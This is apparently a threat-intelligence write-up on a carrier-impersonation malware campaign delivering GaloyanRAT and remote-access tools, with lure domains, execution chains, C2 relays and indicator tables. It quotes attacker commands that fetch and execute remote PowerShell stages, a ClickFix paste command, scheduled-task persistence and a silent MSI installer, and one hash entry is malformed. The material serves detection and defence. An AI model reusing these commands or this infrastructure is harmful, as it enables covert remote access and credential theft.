Technical Analysis: Carrier-Themed Malware Campaign

Updated: 7 days ago
This article is the technical companion to FIND’s high-level briefing. The briefing explains the campaign’s relevance to logistics, trucking, cargo theft and freight fraud; this article is intended for IT, cybersecurity and threat-intelligence specialists who need the underlying execution chains, infrastructure links, persistence artefacts and hunting opportunities.
Infrastructure discovery was supported by Have I Been Squatted (HIBS). We used the HIBS API to expand from known carrier-themed seed domains, surface lookalike registrations and enrich candidates before validating them against campaign-specific evidence.
Analysis of a carrier-themed delivery cluster found a malware repository and web infrastructure supporting several post-compromise branches rather than a single payload. Three execution chains converged on the Node.js variant of a remote-access trojan that FIND is naming GaloyanRAT. The DWM.EXE payload was identified as GaloyanRAT's native C++ variant. Other branches installed ScreenConnect, PulseWireX and MeshCentral; deployed a browser credential stealer; or delivered tunnelling, reverse-proxy and XMRig components.
Delivery infrastructure and lure design
The confirmed web cluster used carrier-themed names and impersonated logistics organisations. Example lures are shown below:


Seven domains had direct campaign-specific links, including shared Telegram telemetry, payload URLs, similar tracking scripts or direct cross-domain references. Six additional domains were assessed as high-confidence cluster members from a matching nameserver and registration pattern, although their payloads could not be recovered.
Domain | Registrar | Registration Date |
carrier-contracts[.]com | Gransy, s.r.o. | 2026-09-01 |
carrier-files[.]com | Gransy, s.r.o. | 2026-09-01 |
carrierbrokercontracts[.]com | Gransy, s.r.o. | 2026-09-09 |
carrierenrollupdate[.]com | Web Commerce Communications Limited / WebNic.cc | 2026-09-15 |
carrieronlinefiles[.]com | Gransy, s.r.o. | 2026-09-10 |
carrierpackbridge[.]com | GMO Internet Group / Onamae.com | 2026-09-02 |
carrierreadydocs[.]com | NameCheap, Inc. | 2026-08-06 |
carrierfilesonline[.]com | Gransy, s.r.o. | 2026-09-09 |
carrierpackready[.]com | GMO Internet Group / Onamae.com | 2026-09-02 |
carriersignpacket[.]com | GMO Internet Group / Onamae.com | 2026-09-04 |
carrierspackethub[.]com | Gransy, s.r.o. | 2026-09-07 |
carrierapproved[.]com | NameCheap, Inc. | 2026-08-05 |
The carrier domains acted as the campaign’s front end. They displayed the impersonated carrier identity and presented a download as the expected packet or document. The malware itself was not always stored on the landing domain. Pages and tracking scripts frequently directed the user to a payload hosted on external infrastructure, principally the Google Cloud Storage bucket under storage.googleapis[.]com/gts-files-2026.
Several sites loaded /tracker.js. The script recorded visits and download activity through Telegram identifiers controlled by the campaign, then supplied or selected the payload link shown to the visitor.
carrierenrollupdate[.]com, for example, used its live tracker to direct users to _20260711_0cf.bat in the GCS bucket; that file subsequently installed the campaign’s ScreenConnect client.
carrierbrokercontracts[.]com and carrieronlinefiles[.]com used closely related tracker implementations, while carrier-contracts[.]com and carrier-files[.]com used an inline variant with a shared Telegram bot and recipient.
Other pages linked directly to named files. carrierreadydocs[.]com referenced PACWEST_FREIGHT_CARRIER_ONLINE_SETUP_2026.vbs in the same bucket. The separation between the lure domain and payload host allowed the operators to change a download without rebuilding the landing page, reuse the storage repository across multiple brands and monitor which lures generated activity.
Hunting for related infrastructure
The initial carrier domains were unlikely to represent the full operation. The naming pattern was broad rather than a simple misspelling of one brand: the actors repeatedly combined freight terms such as carrier, broker, contracts, enroll, files, online, packet, ready, registration and update.
We used the HIBS API as a candidate-generation and enrichment layer. Using the two functions allowed us to perform infrastructure discovery.
Squat - API call to generate and analyse typosquatted permutations
Analyse - Enrich identified domain with DNS, registration, certificate and web signals
The workflow was:
Seed HIBS with confirmed carrier-themed domains and search for related permutations and naming patterns.
Collect candidate domains and enrichment rather than treating an automated score as a verdict.
Compare registration dates, registrars, nameservers, DNS records, certificates, HTTP responses and page characteristics.
Retrieve only the root page and /tracker.js without executing site JavaScript.
Look for campaign-specific links: shared Telegram bot or chat identifiers, matching tracker code, Google Cloud Storage payload URLs, direct cross-domain references and links to recovered malware.
Separate confirmed infrastructure from lookalikes, parked domains and unrelated freight websites.
This process produced a 25-domain working set for validation. Seven domains were directly confirmed through payload, tracking or cross-domain evidence. Six were assessed as high-confidence members of the same cluster because they shared the distinctive nameserver and registration pattern. One was retained as a probable adjacent asset. Two formed a separate MCS-150-themed cluster, four remained suspicious but unconfirmed, and five were unlinked.
GaloyanRAT
The carrier-themed delivery infrastructure, including several carrier* domains, led to three distinct GaloyanRAT execution chains. Two used a NodeRemote installer reached through process hollowing; the third used ClickFix and GitHub-hosted stages.

Capabilities
Both GaloyanRAT implementations provide an operator with broad remote access to an infected system. Observed capabilities include:
executing commands and opening an interactive terminal;
viewing and controlling the desktop, including mouse and keyboard input;
reading and changing clipboard content;
uploading, downloading and managing files;
listing and terminating processes;
collecting host, software and browser information;
identifying installed cryptocurrency-wallet extensions;
downloading and installing additional executable or MSI payloads;
communicating through TCP or WebSocket, with the native C++ variant also supporting UDP;
operating through scheduled tasks in the Node.js variant or a Windows service in the native C++ variant;
displaying a fake security-update screen and restricting local interaction through the C++ variant's privacy mode; and
creating a less-visible, operator-controlled desktop through the C++ variant's hidden-desktop capability.
The recovered web frontend was consistent with an operator console for these capabilities, exposing remote-command, terminal, desktop, file, process, payload-builder and stolen-data interfaces. This supports the malicious-use assessment but does not establish an operator identity or victim count.
Delivery and persistence
What is NodeRemote? NodeRemote is the name used by the recovered .NET installer and its embedded artefacts, including scheduled-task names such as `NodeRemote{...}` and `NodeRemote-XmlTest`. It is not the RAT itself. Its role was to prepare the victim system by installing a local Node.js runtime, downloading GaloyanRAT's main.js, writing the VBS launcher and configuration files, and creating scheduled-task persistence.
Chain 1: Small VBS/WSF → Worker → NodeRemote → GaloyanRAT
Hundreds of small carrier-themed VBS and WSF files launched hidden PowerShell and retrieved a stage from campaign-specific workers[.]dev hosts. Some evaluated the response directly in memory; others briefly wrote it to %TEMP% before execution and deletion.
powershell -ep bypass -c "$script = [scriptblock]::Create((irm test.adriance.workers.dev)); & $script -id 'mUt1002ker'"Nine live Workers decoded to the same .NET loader, which hollowed CasPol.exe and ran a NodeRemote installer. The installer downloaded Node.js 20.11.0 and GaloyanRAT's main.js, then created a logon/hourly scheduled task:
C:\Windows\System32\wscript.exe //nologo "C:\ProgramData\WebServer-<COMPUTERNAME>\nodeupdate.vbs"Persistence was established with scheduled tasks that start with "NodeRemote".
schtasks.exe /Create /F /TN "NodeRemote{<USER-DERIVED-GUID>}" /XML "C:\ProgramData\WebServer-<COMPUTERNAME>\nodetask.xml"
schtasks.exe /Run /TN "NodeRemote{<USER-DERIVED-GUID>}"Chain 2: Embedded-array VBS → CasPol.exe hollowing → GaloyanRAT
Larger VBS files rebuilt an embedded PowerShell loader from numeric arrays. PowerShell decoded a Base85 PE and created suspended C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe through CreateProcessA
The loader then replaced its memory with a NodeRemote installer. Because the process was created through an API call, there was no intermediate shell command. When arguments were present, the target command line was:
Chain 3: ClickFix → GitHub stages → GaloyanRAT
README.js displayed a fake human-verification prompt and copied the following command for the victim to paste into the Windows Run dialog:
powershell -c "irm https://raw.githubusercontent.com/1CodeDev-hub/electronAI/refs/heads/main/basic.txt|iex; exit"The GitHub stages created %LOCALAPPDATA%\TryNodeUpdate, downloaded blockchain.js and Node.js 20.11.0, and registered TryNodeUpdateTask to run immediately, at logon and hourly.
Chain 4: Custom.vhdx → native C++ GaloyanRAT variant
Custom.vhdx contained DWM.EXE, the native C++ GaloyanRAT variant, and external_key_decryptor_json.exe, a utility capable of decrypting Chrome and Edge browser data.

Once launched with sufficient privileges, the C++ variant could install itself as the DesktopControlManager service, displayed as Desktop Windows Manager, and start an interactive-session child for desktop control.
Persistence across the four chains
Chain 1 & 2
Installation: C:\ProgramData\WebServer-<COMPUTERNAME>
Scheduled Task Names:
NodeRemote{...}
NodeRemote-XmlTest
WebServer-*
Chain 3:
Installation: %LOCALAPPDATA%\TryNodeUpdate
Scheduled Task: TryNodeUpdateTask
Chain 4:
Installation: C:\Users\Public\DWM.EXE
Service Name: DesktopControlManager
GaloyanRAT Analysis
C2 analysis
GaloyanRAT first retrieved hexadecimal ciphertext from:
hxxps://gist.githubusercontent[.]com/wservices66-maker/53ba3186cf8ec0cada46fc1ccb4a0ec7/raw/apiKey
It decrypted that content with AES-128-ECB using ErjanikGaloyan$$, removed PKCS#7 padding and parsed a JSON urls array. If the Gist path failed, the client queried BNB contract 0xCc4BCd51e0eA7E254b0F30044538F6Cb86a4E61b through public RPC services for replacement discovery data:

The selected backend returned relay records rather than acting as a single fixed C2. Four responsive backends returned the same five raw-TCP relay addresses at collection time:
89.117.109[.]140:46149
84.200.87[.]236:62790
167.148.201[.]35:49863
167.148.201[.]183:49782
206.206.127[.]94:44255
This separation of encrypted discovery data, replaceable backends and relay nodes gave the operators several points at which infrastructure could be rotated without rebuilding the implant.
The decrypted configuration history contained the below C2s:
find.beta-into[.]space
cdn.beta-into[.]space
cdn.vooi-app[.]xyz
api.vooi-app[.]xyz
amc-us.mprevive[.]com
do.opinionvip[.]clubThe last three appeared across all recovered Gist revisions, while the beta-into, vooi-app, Worker and ngrok entries rotated.
The public frontend recovered from cdn.beta-into[.]space matched GaloyanRAT's endpoint capabilities and provided an infrastructure-level link to its operator console. The wservices66-maker GitHub account also hosted NodeRemote installer material and the encrypted configuration Gist:

The native DWM.EXE RAT recovered from Custom.vhdx used the same Gist and used the same AES key from the string ErjanikGaloyan$$`. Further protocol analysis found the same registration schema, JSON packet vocabulary, raw-TCP framing and relay retry model. FIND therefore assesses DWM.EXE as the native C++ variant of the GaloyanRAT family.
Shared C2 Protocol
The DWM.EXE binary and the Node.js GaloyanRAT both retrieve it's configuration from the Gist, decrypting using the same string & resolving the same C2 domains.
Both implementations serialize the same packet model as UTF-8 JSON, use the same register, registered, ping and pong control flow, submit the same host-registration fields and frame raw TCP messages with a four-byte big-endian length. Both also rotate relay candidates using the same phased retry pattern. DWM identifies itself with cpp-tcp, cpp-wss or cpp-udp, while the Node.js client uses node-tcp or node-wss. These implementation-specific labels within an otherwise shared protocol indicate that the backend was designed to support both clients.
Attribute | DWM.EXE variant | Node.js variant |
Configuration location | Same raw wservices66-maker Gist | Same raw wservices66-maker Gist |
Decryption material | AES-128-ECB key ErjanikGaloyan$$ | AES-128-ECB key ErjanikGaloyan$$ |
Discovery model | Encrypted configuration, relay discovery and cached relay data | Encrypted configuration used to obtain live endpoints |
Packet protocol | JSON packets, four-byte big-endian TCP framing, common control messages | Same JSON packets, TCP framing and control messages |
Registration marker | cpp-tcp, cpp-wss or cpp-udp | node-tcp or node-wss |
Implementation | Native C++ service and interactive-session child | Bundled Node.js application with scheduled-task persistence |
FIND assesses the Node.js and native C++ samples as two variants of the GaloyanRAT family. The Node.js variant provides the portable client delivered through the three execution chains described above; the DWM.EXE variant provides a native Windows implementation with service-based operation, interactive-session process creation and UDP transport. Their shared wire protocol, registration model, discovery configuration and backend design establish the family relationship despite the different programming languages and persistence models.
ScreenConnect installation

carrierenrollupdate[.]com impersonated GlobalTranz Enterprises and loaded /tracker.js. The tracker recorded visitor and download telemetry through Telegram and selected a payload.

The observed route downloaded _20260711_0cf.bat from the gts-files-2026 bucket. The BAT relaunched itself with an install argument in a hidden window and downloaded a ScreenConnect MSI using BITS with PowerShell/.NET fallbacks. It then invoked `msiexec` silently and deleted the local MSI copy.
The BAT assembled the download URL as hXXps[:]//screen-connect[.]ink/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest and stored the result as %TEMP%\%RANDOM%.msi.
This installed a ScreenConnect server configured to communicate with screen-connect[.]ink:
Service Name: ScreenConnect Client (8399eafe781eb473)
Screenconnect Server: relay-85768.screen-connect[.]ink:8443
PulseWireX and ScreenConnect orchestrators
Three PowerShell orchestrators installed both PulseWireX and ScreenConnect and verified the resulting services, creating redundant remote-access paths.
The orchestrator downloaded each package and silently installed it with msiexec:
Invoke-WebRequest -Uri $Url -OutFile $outFile -UseBasicParsing -ErrorAction Stop
Start-Process -FilePath "msiexec.exe" -ArgumentList "/i `"$outFile`" /qn /norestart" -Wait -PassThru -NoNewWindowInstallation: C:\Program Files\PulseWireX (<instance>)
Service PulseWireX-<instance>
MeshCentral execution chain
The recovered Mesh agent installed as a persistent Windows service and connected to mcentrals[.]com. As with ScreenConnect, the product can be used legitimately; its deceptive delivery context made this deployment suspicious.
Tunnelling, reverse-proxy and mining execution chain
multiplatform.exe supported Cloudflare Tunnel, Pinggy, localtunnel and WebSocket transports. It could install an automatic service, accept an instance name through --service-guid and launch in a LocalSystem session.
Three Go binaries identified themselves as reverseproxy/cmd/agent and used yamux. Their server address was not recovered statically.
The XMRig launcher referenced mining pools pool.supportxmr[.]com:443 and xmrpool[.]eu:9999.
References
On July 14th on X, @malwrhunterteam shared the "Remote Support Panel" we saw on our campaign linked to GaloyanRAT. Later that day, @smica83 reposted a linked payload, ITF_LOGISITICS_GROUP_ONLINE_CARRIER_INVITATION.vbs.

Additional related samples were shared on the 24th July:

@skocherhan identified the Github account linked to this campagin:

Indicators of Compromise
Initial Delivery and Carrier impersonation
Indicator | Assessment | Context |
carrier-contracts[.]com | Confirmed | Kalerx Transport lure linked to test.adriance.workers[.]dev and the NodeRemote/GaloyanRAT chain. |
carrier-files[.]com | Confirmed | Off Top Xpress document lure; the listed WSF remained access-controlled. |
carrierbrokercontracts[.]com | Confirmed | Larkin Express Logistics lure linked to a Worker loader and directly cross-linked to carrierpackbridge[.]com |
carrierenrollupdate[.]com | Confirmed | GlobalTranz lure whose live /tracker.js delivered the ScreenConnect BAT from GCS. |
carrierpackbridge[.]com | Confirmed | Carrier-document landing page sharing the campaign's tracker and Telegram telemetry. |
carrierreadydocs[.]com | Confirmed | Directly referenced by another confirmed landing page and linked through the campaign infrastructure pattern. |
carrierfilesonline[.]com | High-confidence suspected | PACWEST Freight lure that referenced a carrier-themed VBS in the campaign bucket. |
carrierpackready[.]com | High-confidence suspected | Same validated registration and infrastructure cluster; payload not recovered. |
carriersignpacket[.]com | High-confidence suspected | Same validated registration and infrastructure cluster; payload not recovered. |
carrierspackethub[.]com | High-confidence suspected | Same validated registration and infrastructure cluster; payload not recovered. |
carrierapproved[.]com | Probable adjacent asset | Related registration and nameserver pattern; payload unresolved. |
storage.googleapis[.]com/gts-files-2026 | Payload repository | Campaign bucket prefix used for scripts, executables, MSIs and disk-image delivery. |
C2, RMM & Staging Infra
Indicator | Type | Context |
*.workers[.]dev | Domain pattern | Multiple live PowerShell/process-hollowing stage hosted |
cdn.beta-into[.]space | Domain | GaloyanRAT discovery backend and observed operator-panel host. |
cdn.vooi-app[.]xyz | Domain | GaloyanRAT discovery and payload host. |
relay-85768.screen-connect[.]ink:8443 | domain:port | ScreenConnect relay endpoint embedded in the delivered MSI. |
mcentrals[.]com:443 | domain:port | MeshCentral remote-access endpoint embedded in the recovered agent. |
89.117.109[.]140:46149 | IP:port | GaloyanRAT raw-TCP relay returned by live discovery. |
84.200.87[.]236:62790 | IP:port | GaloyanRAT raw-TCP relay returned by live discovery. |
167.148.201[.]35:49863 | IP:port | GaloyanRAT raw-TCP relay returned by live discovery. |
167.148.201[.]183:49782 | IP:port | GaloyanRAT raw-TCP relay returned by live discovery. |
206.206.127[.]94:44255 | IP:port | GaloyanRAT raw-TCP relay returned by live discovery. |
File
Artifact | SHA256 |
Kalerx carrier-themed VBS | a666bf66ab893e55c1dfdf3c55a948cd5c9689c77072f2babb2ed9f00339c806 |
Common Worker-decoded .NET loader | 0e274d152b214417395069999d947b9fb0a5aee58e3f35479099269b43b518e7 |
Representative embedded-array VBS | a568b2937942fb8e746e5a7d67f34bf80d556335dffda969b8e7d5402ef2cf41 |
NodeRemote installer | cb5d9e2e81c3b8bff3caa0b21fc947423d542f3e49d140d08306207e2d3d4bb0 |
NodeRemote installer | 0814bde11e8f9d7023a990b8e08efec713c27cea6abb72021e4c2c59002ccd2b |
NodeRemote installer | 43f8a0b151b204fa9f23ebd6b0f881ee2f5f15f249c215e437e9b66b6a39ce0a |
ClickFix README.js | 27e2b8f32d2310546e7b3cc552cce5f0cc8bea19f936ba1583e63db9e3765b35 |
GaloyanRAT main.js | 6caea085346e7966e09acc39aa7f0be62be5814dc53963031c85613ea4376822 |
ScreenConnect delivery BAT | c8d6745073acc27c7233ab029651cb2a506c935259331a5516fa650a7e0e1a43 |
ScreenConnect MSI from live chain | b3fdca3f37a4b27261e45130cf731a85d5a1c4933d03eb6607340b0f3429317f |
Recovered ScreenConnect MSI | b21bf61ee8879b136aa953b0d90e09e683305a8360233602a5c0c3eb7a378e2cb3fdca3f37a4b27261e45130cf731a85d5a1c4933d03eb6607340b0f3429317f |
Recovered ScreenConnect MSI | dc0a3393c4169882975ee5bc5b5a0e3336d224b919fdf7aa4d8fb4b0a3a422f6 |
Recovered ScreenConnect MSI | e6e635b738b0a00d6b047ee8e6167a9b0846e9e83837c34e7872298999b47bc9 |
Recovered ScreenConnect MSI | f9163b7f1335d1a496cc0309a0da381d5852be57586621990d75233483f8aac9 |
Custom.vhdx | b0266736e86f2185af4fa97d56e3e25463becc039fa58544122adff0c0a0cdb4 |
Browser credential stealer | 0f18adc87ca5b66e9fa2a4612a1f2710d683d2a3919f23e14f55ee0568fbda45 |
Native C++ GaloyanRAT (DWM.EXE) | ef0bb069aa8435bd6ec74464c7a91d54aa00e61615171ef4ef821777b3dbd9ba |
PulseWireX/ScreenConnect orchestrator | 7fe836b942660235f90b7bb1698110c7e8ea827c8556590c0077d2f52b25433a |
PulseWireX/ScreenConnect orchestrator | afcf9922bcd75e39472756cee61ce7ad729672094cb387fb8906457e261a3be4 |
PulseWireX/ScreenConnect orchestrator | b48a472be4e87af47508636e642718fb35f2bba771659466869305d65d1d21cf |
PulseWireX db22d802 MSI | c5610933bb4a987f8a87f08969e788c269e1a5e9868caa1c5f9fa39b77d1fa2d |
PulseWireX bambargia MSI | ee640a7485016aec8b7ea8714d209bc7783ab02c638974b0ff3c2d59cb822af8 |
PulseWireX `owners789` MSI | ab6007f7ad4fc0cc0159ec6353f8b02fd73ff1df98bce1194b26d10db006978a |
PulseWireX skftjl MSI | a8446addc96fc0dad897991c20be4ac9fa9d2b3448db999226041f08beaba7f9 |
PulseWireX nextjs2385 MSI | 14551e863ec2ffc76e1a2c14c0b68e77672f986d40b5131e8ce2580183491b5c |
MeshCentral agent | 93228a0438821147f78aaba149ba6195543270e9ea8ba27d14291f60ad170545 |
Tunnelling component | 4661e606c7ed80723d115d9ff8c1577a6c08e3372c6b702e2a1847d8dab5cdc7 |
Reverse-proxy agent | 0c7c61be125d94b828e9f7fc846c1059ff6a50cb803c7c03234ac9f65efedf48 |
Reverse-proxy agent | 3d330a2f1c9c082bc5932ef0cc3822339519f4f7ab0796968eb2aa3a22de29bd |
Reverse-proxy agent | 5c9dd7f29811897cb4ed60039f865238e80839363b9305edac86a8e372c6771a |
XMRig launcher | 8ccc33031ac652ca3f188f9a9818bcd5d32c785233e22ea2107e1cefc0ee2a6b |
Misc
Indicator | Type | Context |
ScreenConnect Client (8399eafe781eb473) | Service | Persistent service installed by the observed ScreenConnect MSI. |
DesktopControlManager | Service | Service name used by the custom DWM RAT. |
TryNodeUpdateTask | Scheduled Task | ClickFix/GitHub GaloyanRAT persistence. |
NodeRemote-XmlTest | Scheduled Task | NodeRemote scheduled-task artefact. |
gist.githubusercontent[.]com/wservices66-maker/53ba3186cf8ec0cada46fc1ccb4a0ec7/raw/apiKey | URL | Encrypted GaloyanRAT discovery configuration. |
0xCc4BCd51e0eA7E254b0F30044538F6Cb86a4E61b | BNB contract | GaloyanRAT fallback discovery mechanism. |
ErjanikGaloyan$$ | String | AES-128-ECB configuration key and useful code-family hunting string; |
Comments